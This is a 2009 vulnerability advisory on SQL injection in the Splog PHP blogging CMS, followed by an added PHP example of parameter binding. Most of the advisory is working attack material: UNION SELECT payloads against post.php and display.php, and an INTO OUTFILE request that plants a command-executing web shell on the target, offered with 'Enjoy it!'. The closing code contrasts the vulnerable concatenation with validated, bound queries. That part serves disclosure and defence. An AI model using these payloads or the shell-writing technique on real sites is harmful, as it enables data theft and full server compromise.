
MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->






-----------------------------------------------------------------
MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->
-----------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://sourceforge.net/projects/splog/
-->DOWNLOAD: http://sourceforge.net/projects/splog/
-->DEMO: N/A
-->CATEGORY: CMS / Blogging
-->DESCRIPTION: Splog is a simple PHP and MySQL blogging framework allowing
		full integration into a website by being designed for use...
-->RELEASED: 2009-06-01

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: N/A
-->CATEGORY: SQL INJECTION
-->AFFECTED VERSION: <= 1.2-Beta (previous versions that were checked are also vulnerable)
-->Discovered Bug date: 2009-06-08
-->Reported Bug date: 2009-06-09
-->Fixed bug date: 2009-06-10
-->Info patch (1.3): http://sourceforge.net/projects/splog/
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: To my girlfriend Marijose... brother, sister-in-law, parents (and friends xD) for their support.
-->EXTRA-COMMENT: Thanks to everyone for putting up with me! (I love you, little one!)

#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################

-------------------
PROOF OF CONCEPT:
-------------------

<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>

[++] GET var --> 'id'

[++] File vuln --> 'post.php'

~~~~~> http://[HOST]/[PATH]/post.php?id=-1+UNION+SELECT+1,user(),database(),version(),user(),database()%23

<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>

[++] POST var --> 'pCategory'

[++] File vuln --> 'display.php'

POST http://[HOST]/[PATH]/display.php HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Referer: http://[HOST]/[PATH]/display.php
Content-Type: application/x-www-form-urlencoded
pCategory=-1'+UNION+SELECT+1,2,3,4,5,6# <--- INJECTION

[++[Return]++] ~~~~~> user, version or database.

----------
EXPLOIT:
----------

<<<<---------++++++++++++++ Extra-Condition: privileges to create files +++++++++++++++++--------->>>>

[GET]~~~~~> http://[HOST]/[PATH]/post.php?id=-1+UNION+ALL+SELECT+'SPLOG <= 1.2 Beta--SHELL BY --Y3NH4CK3R-->','

YOUR SHELL IS ON!
','



Get var (cmd) to execute comands. Enjoy it!

','

Command Result:

','

','

By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com

'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'%23

[POST]~~~~~>

POST http://[HOST]/[PATH]/display.php HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Referer: http://[HOST]/[PATH]/display.php
Content-Type: application/x-www-form-urlencoded
pCategory=-1'+UNION+ALL+SELECT+'SPLOG <= 1.2 Beta--SHELL BY --Y3NH4CK3R-->','

YOUR SHELL IS ON!
','



Get var (cmd) to execute comands. Enjoy it!

','

Command Result:

','

','

By y3nh4ck3r. Contact: y3nh4ck3r@gmail.com

'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'# <--- INJECTION

[++[Return]++] ~~~~~> Your shell in http://[HOST]/[PATH]/shell.php

#######################################################################
#######################################################################
##*******************************************************************##
## SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...   ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
## GREETZ TO: SPANISH H4ck3Rs community!                             ##
##*******************************************************************##
#######################################################################
#######################################################################
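
Added example, not part of the original advisory and not Splog's own code: the string-concatenation pattern that makes parameters such as 'id' and 'pCategory' injectable, next to a hardened form using integer validation and PDO bound parameters. The table, columns and function names are hypothetical, the inputs are constructed in the shape of the requests above, and an in-memory SQLite database stands in for MySQL so the script runs offline.

```php
<?php
// Added example: hypothetical schema and function names, not Splog's code.
// In-memory SQLite stands in for MySQL so the script runs without a server.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, category TEXT)");
$db->exec("INSERT INTO posts (title, category) VALUES ('Hello', 'news'), ('Notes', 'misc')");

// Vulnerable pattern: the request value is concatenated into the statement.
// The value sits in a numeric context with no quotes around it, so quote
// escaping such as magic quotes has nothing to escape.
function post_by_id_vulnerable(PDO $db, string $id): array {
    return $db->query("SELECT id, title, category FROM posts WHERE id = " . $id)
              ->fetchAll(PDO::FETCH_NUM);
}

// Hardened numeric case: accept only a positive integer, then bind it.
function post_by_id(PDO $db, string $id): array {
    $n = filter_var($id, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($n === false) {
        return [];                      // reject the request, run no query
    }
    $st = $db->prepare("SELECT id, title, category FROM posts WHERE id = ?");
    $st->bindValue(1, $n, PDO::PARAM_INT);
    $st->execute();
    return $st->fetchAll(PDO::FETCH_NUM);
}

// Hardened string case: the value is sent as bound data, never as SQL text.
function posts_by_category(PDO $db, string $category): array {
    $st = $db->prepare("SELECT id, title, category FROM posts WHERE category = ?");
    $st->execute([$category]);
    return $st->fetchAll(PDO::FETCH_NUM);
}

// Constructed inputs (three columns to match the hypothetical table;
// "--" is SQLite's comment marker).
$id_input  = "-1 UNION SELECT 1,2,3";
$cat_input = "-1' UNION SELECT 1,2,3 -- ";

foreach ([
    'concatenated id, constructed input'  => post_by_id_vulnerable($db, $id_input),
    'validated id, constructed input'     => post_by_id($db, $id_input),
    'bound category, constructed input'   => posts_by_category($db, $cat_input),
    'validated id, legitimate value "1"'  => post_by_id($db, "1"),
] as $label => $rows) {
    printf("%-40s %d row(s)\n", $label, count($rows));
}
```

The same prepare/bind calls work unchanged with PDO's MySQL driver; only the DSN differs.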
